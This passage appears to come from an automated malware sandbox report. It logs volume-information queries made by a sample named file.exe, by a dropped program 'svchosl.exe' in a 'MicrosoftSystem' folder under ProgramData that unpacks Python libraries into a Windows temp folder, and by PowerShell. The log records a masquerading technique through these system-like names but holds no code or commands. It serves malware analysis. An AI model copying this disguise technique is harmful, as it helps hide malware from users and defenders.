Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\libcrypto-1_1.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\libffi-7.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\libssl-1_1.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\select.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\unicodedata.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_hashlib.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_lzma.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_socket.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_ssl.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_socket.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\select.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_lzma.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_hashlib.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\base_library.zip VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122 VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\Windows\Temp\_MEI65122\_ssl.pyd VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Queries volume information: C:\ProgramData\MicrosoftSystem\svchosl.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
